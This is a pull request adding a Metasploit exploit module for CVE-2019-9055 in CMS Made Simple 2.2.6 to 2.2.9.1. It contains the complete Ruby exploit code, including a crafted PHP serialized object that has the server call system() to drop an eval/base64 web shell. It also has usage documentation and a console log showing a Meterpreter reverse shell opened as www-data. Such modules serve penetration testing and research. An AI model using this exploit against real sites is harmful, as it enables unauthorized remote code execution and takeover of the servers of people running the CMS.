### PR TITLE
Add CMS Made Simple object injection exploit module

### DIFF
--- a/documentation/modules/exploit/multi/http/cmsms_object_injection_rce.md
+++ b/documentation/modules/exploit/multi/http/cmsms_object_injection_rce.md
@@ -1,6 +1,6 @@
 ## Description
 
-This module exploits an object injection vulnerability on files action.admin_bulk_template in DesignManager module (that is installed by default from CMS Made Simple). With an unprivileged user with Designer permission, it is possible reach an unserialize function with a crafted value in the m1_allparms parameter that lead in a RCE.
+This module exploits an object injection vulnerability on files `action.admin_bulk_template` in DesignManager module (that is installed by default from CMS Made Simple). With an unprivileged user with Designer permission, it is possible to reach an `unserialize` function with a crafted value in the `m1_allparms` parameter resulting in execution of arbitrary PHP code.
 
 Tested on CMS Made Simple 2.2.6, 2.2.7, 2.2.8, 2.2.9 and 2.2.9.1.
 

--- a/documentation/modules/exploit/multi/http/cmsms_object_injection_rce.md
+++ b/documentation/modules/exploit/multi/http/cmsms_object_injection_rce.md
@@ -24,7 +24,7 @@ Affecting CMS Made Simple, version 2.2.6, 2.2.7, 2.2.8, 2.2.9, 2.2.9.1
 
 ## Options
 
-* **TARGETURI**: Path to CMS Made Simple (CMSMS) App installation (“/” is the default)
+* **TARGETURI**: Path to CMS Made Simple (CMSMS) App installation (`/` is the default)
 * **USERNAME**: Username to authenticate with
 * **PASSWORD**: Password to authenticate with
 

--- a/documentation/modules/exploit/multi/http/cmsms_object_injection_rce.md
+++ b/documentation/modules/exploit/multi/http/cmsms_object_injection_rce.md
@@ -1,0 +1,61 @@
+## Description
+
+This module exploits an object injection vulnerability on files action.admin_bulk_template in DesignManager module (that is installed by default from CMS Made Simple). With an unprivileged user with Designer permission, it is possible reach an unserialize function with a crafted value in the m1_allparms parameter that lead in a RCE.
+
+Tested on CMS Made Simple 2.2.6, 2.2.7, 2.2.8, 2.2.9 and 2.2.9.1.
+
+## Vulnerable Application
+
+Affecting CMS Made Simple, version 2.2.6, 2.2.7, 2.2.8, 2.2.9, 2.2.9.1
+
+## Verification Steps
+
+1. Setting up a working installation of CMS Made Simple (CMSMS)
+2. [OPTIONALLY] setting up a new user, assign it to a group and set the *Designer* permissions on group
+3. Start `msfconsole`
+4. `use exploit/multi/http/cmsms_object_injection_rce`
+5. `set RHOST <IP>`
+6. `set USERNAME <USERNAME>`
+7. `set PASSWORD <PASSWORD>`
+8. `check`
+9. You should see `The target appears to be vulnerable.`
+10. `exploit`
+11. You should get a meterpreter session!
+
+## Options
+
+* **TARGETURI**: Path to CMS Made Simple (CMSMS) App installation (“/” is the default)
+* **USERNAME**: Username to authenticate with
+* **PASSWORD**: Password to authenticate with
+
+## Scenario
+
+### Tested on CMS Made Simple (CMSMS) 2.2.8
+
+```
+msf5 > use exploit/multi/http/cmsms_object_injection_rce
+msf5 exploit(multi/http/cmsms_object_injection_rce) > set rhosts target.com
+rhosts => target.com
+msf5 exploit(multi/http/cmsms_object_injection_rce) > check
+[*] 192.168.1.64:80 - The target appears to be vulnerable.
+msf5 exploit(multi/http/cmsms_object_injection_rce) > set username daniele
+username => daniele
+msf5 exploit(multi/http/cmsms_object_injection_rce) > set password qwerty
+password => qwerty
+msf5 exploit(multi/http/cmsms_object_injection_rce) > set targeturi /cmsms/
+targeturi => /cmsms/
+msf5 exploit(multi/http/cmsms_object_injection_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.64:4444
+[*] Sending stage (38247 bytes) to 192.168.1.64
+[*] Meterpreter session 1 opened (192.168.1.64:4444 -> 192.168.1.64:41308) at 2019-11-01 11:15:57 +0100
+[+] Deleted RsjeISeAu.php
+
+meterpreter > getuid
+Server username: www-data (33)
+meterpreter > quit
+[*] Shutting down Meterpreter...
+
+[*] 192.168.1.64 - Meterpreter session 1 closed.  Reason: User exit
+msf5 exploit(multi/http/cmsms_object_injection_rce) > 
+```

--- a/modules/exploits/multi/http/cmsms_object_injection_rce.rb
+++ b/modules/exploits/multi/http/cmsms_object_injection_rce.rb
@@ -5,7 +5,6 @@
 
 class MetasploitModule < Msf::Exploit::Remote
   Rank = NormalRanking
-  
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::FileDropper
 

--- a/modules/exploits/multi/http/cmsms_object_injection_rce.rb
+++ b/modules/exploits/multi/http/cmsms_object_injection_rce.rb
@@ -23,8 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote
         2.2.6, 2.2.7, 2.2.8, 2.2.9 and 2.2.9.1.
       ),
       'Author' => [
-        'Daniele Scanu', # Discovered and exploit. twitter.com/sk4pwn
-        'danielescanu20[at]gmail.com'
+        'Daniele Scanu danielescanu20[at]gmail.com', # Discovered and exploit. twitter.com/sk4pwn
       ],
       'License' => MSF_LICENSE,
       'References' => [

--- a/modules/exploits/multi/http/cmsms_object_injection_rce.rb
+++ b/modules/exploits/multi/http/cmsms_object_injection_rce.rb
@@ -113,7 +113,7 @@ class MetasploitModule < Msf::Exploit::Remote
     unless res.code == 302 && res.get_cookies && res.headers['Location'] =~ %r{\/admin\?(.*)?=(.*)}
       fail_with(Failure::NoAccess, 'Authentication was unsuccessful')
     end
-
+    store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])
     vprint_good("#{peer} - Authentication successful")
     @csrf_name = Regexp.last_match(1)
     csrf_val = Regexp.last_match(2)

--- a/modules/exploits/multi/http/cmsms_object_injection_rce.rb
+++ b/modules/exploits/multi/http/cmsms_object_injection_rce.rb
@@ -45,6 +45,9 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('PASSWORD', [true, 'Password to authenticate with', ''])
       ]
     )
+    register_advanced_options([
+      OptBool.new('ForceExploit', [false, 'Override check result', false])
+    ])
   end
 
   def multipart_form_data(uri, data, message)

--- a/modules/exploits/multi/http/cmsms_object_injection_rce.rb
+++ b/modules/exploits/multi/http/cmsms_object_injection_rce.rb
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
         An issue was discovered in CMS Made Simple 2.2.8.
         In the module DesignManager (in the files action.admin_bulk_css.php
         and action.admin_bulk_template.php), with an unprivileged user
-        with Designer permission, it is possible reach an unserialize
+        with Designer permission, it is possible to reach an unserialize
         call with a crafted value in the m1_allparms parameter,
         and achieve object injection.
 

--- a/modules/exploits/multi/http/cmsms_object_injection_rce.rb
+++ b/modules/exploits/multi/http/cmsms_object_injection_rce.rb
@@ -106,7 +106,7 @@ class MetasploitModule < Msf::Exploit::Remote
     res = post('login.php', data)
 
     unless res
-      fail_with(Failure::NotFound,
+      fail_with(Failure::Unreachable,
         'A response was not received from the remote host')
     end
 

--- a/modules/exploits/multi/http/cmsms_object_injection_rce.rb
+++ b/modules/exploits/multi/http/cmsms_object_injection_rce.rb
@@ -146,7 +146,10 @@ class MetasploitModule < Msf::Exploit::Remote
     multipart_form_data('moduleinterface.php', data, message)
     register_files_for_cleanup(shell_name)
     # open shell
-    get('admin', shell_name)
+    res = get('admin', shell_name)
+    if res && res.code == 404
+      print_error "Shell #{shell_name} not found"
+    end
   end
 
   def exploit

--- a/modules/exploits/multi/http/cmsms_object_injection_rce.rb
+++ b/modules/exploits/multi/http/cmsms_object_injection_rce.rb
@@ -4,6 +4,8 @@
 ##
 
 class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+  
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::FileDropper
 

--- a/modules/exploits/multi/http/cmsms_object_injection_rce.rb
+++ b/modules/exploits/multi/http/cmsms_object_injection_rce.rb
@@ -45,9 +45,6 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('PASSWORD', [true, 'Password to authenticate with', ''])
       ]
     )
-    @csrf = nil
-    @cookies = nil
-    @csrf_name = nil
   end
 
   def multipart_form_data(uri, data, message)

--- a/modules/exploits/multi/http/cmsms_object_injection_rce.rb
+++ b/modules/exploits/multi/http/cmsms_object_injection_rce.rb
@@ -1,0 +1,162 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'CMS Made Simple Authenticated RCE via object injection',
+      'Description' => %q(
+        An issue was discovered in CMS Made Simple 2.2.8.
+        In the module DesignManager (in the files action.admin_bulk_css.php
+        and action.admin_bulk_template.php), with an unprivileged user
+        with Designer permission, it is possible reach an unserialize
+        call with a crafted value in the m1_allparms parameter,
+        and achieve object injection.
+
+        This module has been successfully tested on CMS Made Simple versions
+        2.2.6, 2.2.7, 2.2.8, 2.2.9 and 2.2.9.1.
+      ),
+      'Author' => [
+        'Daniele Scanu', # Discovered and exploit. twitter.com/sk4pwn
+        'danielescanu20[at]gmail.com'
+      ],
+      'License' => MSF_LICENSE,
+      'References' => [
+        ['CVE', '2019-9055'],
+        ['CWE', '74'],
+        ['URL', 'https://newsletter.cmsmadesimple.org/w/89247Qog4jCRCuRinvhsofwg'],
+        ['URL', 'https://www.cmsmadesimple.org/2019/03/Announcing-CMS-Made-Simple-v2.2.10-Spuzzum']
+      ],
+      'Privileged' => false,
+      'Platform' => ['php'],
+      'Arch' => [ARCH_PHP],
+      'Targets' => [['Automatic', {}]],
+      'DefaultTarget' => 0,
+      'DisclosureDate' => 'Mar 26 2019'))
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'Base cmsms directory path', '/']),
+        OptString.new('USERNAME', [true, 'Username to authenticate with', '']),
+        OptString.new('PASSWORD', [true, 'Password to authenticate with', ''])
+      ]
+    )
+    @csrf = nil
+    @cookies = nil
+    @csrf_name = nil
+  end
+
+  def multipart_form_data(uri, data, message)
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'admin', uri),
+      'method' => 'POST',
+      'data' => data,
+      'ctype' => "multipart/form-data; boundary=#{message.bound}",
+      'cookie' => @cookies
+    )
+  end
+
+  def post(uri, data)
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'admin', uri),
+      'method' => 'POST',
+      'vars_post' => data,
+      'cookie' => @cookies
+    )
+  end
+
+  def get(path, filename)
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, path, filename),
+      'method' => 'GET'
+    )
+  end
+
+  def check
+    res = get('', 'index.php')
+    unless res
+      vprint_error 'Connection failed'
+      return CheckCode::Unknown
+    end
+
+    unless res.body.match?(/CMS Made Simple/i)
+      return CheckCode::Safe
+    end
+
+    version = Gem::Version.new(res.body.scan(/CMS Made Simple<\/a> version (\d+\.\d+\.\d+)/).flatten.first)
+    vprint_status("#{peer} - CMS Made Simple Version: #{version}")
+
+    if version <= Gem::Version.new('2.2.9.1')
+      return CheckCode::Appears
+    end
+
+    return CheckCode::Safe
+  end
+
+  def login
+    data = {
+      'username' => datastore['USERNAME'],
+      'password' => datastore['PASSWORD'],
+      'loginsubmit' => 'Submit'
+    }
+    res = post('login.php', data)
+
+    unless res
+      fail_with(Failure::NotFound,
+        'A response was not received from the remote host')
+    end
+
+    unless res.code == 302 && res.get_cookies && res.headers['Location'] =~ %r{\/admin\?(.*)?=(.*)}
+      fail_with(Failure::NoAccess, 'Authentication was unsuccessful')
+    end
+
+    vprint_good("#{peer} - Authentication successful")
+    @csrf_name = Regexp.last_match(1)
+    csrf_val = Regexp.last_match(2)
+    @csrf = { @csrf_name => csrf_val }
+    @cookies = res.get_cookies
+  end
+
+  def send_injection
+    # prepare shell command
+    shell_name = rand_text_alpha(8..12) + '.php'
+    cmd = Rex::Text.encode_base64(payload.encoded).delete('\n', '')
+    cmd = "echo \"<?php eval(base64_decode('" + cmd + "')); ?>\" > " + shell_name
+
+    # prepare serialized object
+    final_payload = 'a:2:{s:10:"css_select";a:4:{i:0;s:2:"19";i:1;s:2:"21";i:2;O:13:"dm_xml_reader":1:{s:31:"'
+    final_payload += "\x00" + 'dm_xml_reader' + "\x00"
+    final_payload += '_old_err_handler";a:2:{i:0;O:21:"CmsLayoutTemplateType":1:{s:28:"'
+    final_payload += "\x00" + 'CmsLayoutTemplateType' + "\x00"
+    final_payload += '_data";a:2:{s:13:"help_callback";s:6:"system";s:4:"name";s:' + cmd.length.to_s + ':"' + cmd + '";}}'
+    final_payload += 'i:1;s:21:"get_template_helptext";}};i:3;s:5:"dummy";}s:15:"css_bulk_action";s:6:"export";}'
+
+    # create message with payload
+    message = Rex::MIME::Message.new
+    message.add_part(@csrf[@csrf_name], nil, nil, "form-data; name=\"#{@csrf_name}\"")
+    message.add_part('DesignManager,m1_,admin_bulk_template,0', nil, nil, 'form-data; name="mact"')
+    message.add_part(Rex::Text.encode_base64(final_payload), nil, nil, 'form-data; name="m1_allparms"')
+    data = message.to_s
+
+    # send payload
+    multipart_form_data('moduleinterface.php', data, message)
+    register_files_for_cleanup(shell_name)
+    # open shell
+    get('admin', shell_name)
+  end
+
+  def exploit
+    unless [CheckCode::Detected, CheckCode::Appears].include?(check)
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+    login
+    send_injection
+  end
+end

--- a/modules/exploits/multi/http/cmsms_object_injection_rce.rb
+++ b/modules/exploits/multi/http/cmsms_object_injection_rce.rb
@@ -125,7 +125,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # prepare shell command
     shell_name = rand_text_alpha(8..12) + '.php'
     cmd = Rex::Text.encode_base64(payload.encoded).delete('\n', '')
-    cmd = "echo \"<?php eval(base64_decode('" + cmd + "')); ?>\" > " + shell_name
+    cmd = "echo \"<?php eval(base64_decode('#{cmd}')); ?>\" > #{shell_name}"
 
     # prepare serialized object
     final_payload = 'a:2:{s:10:"css_select";a:4:{i:0;s:2:"19";i:1;s:2:"21";i:2;O:13:"dm_xml_reader":1:{s:31:"'


### PR DESCRIPTION
CMS Made Simple is an open source cms. With this CMS you can modify the contents with a pre-installed module called "Design Manager" that it's vulnerable to object injection. 

This module exploit an unserialize in CMS Made Simple 2.2.6, 2.2.7, 2.2.8, 2.2.9 and 2.2.9.1 sending a serialized object that lead to remote code execution.

## Verification

Launch metasploit and set the appropiate options:

- [ ] Start `msfconsole`
- [ ] `use exploit/multi/http/cmsms_object_injection_rce`
- [ ] `set RHOST <IP>`
- [ ] `set USERNAME <USERNAME>`
- [ ] `set PASSWORD <PASSWORD>`
- [ ] `exploit`

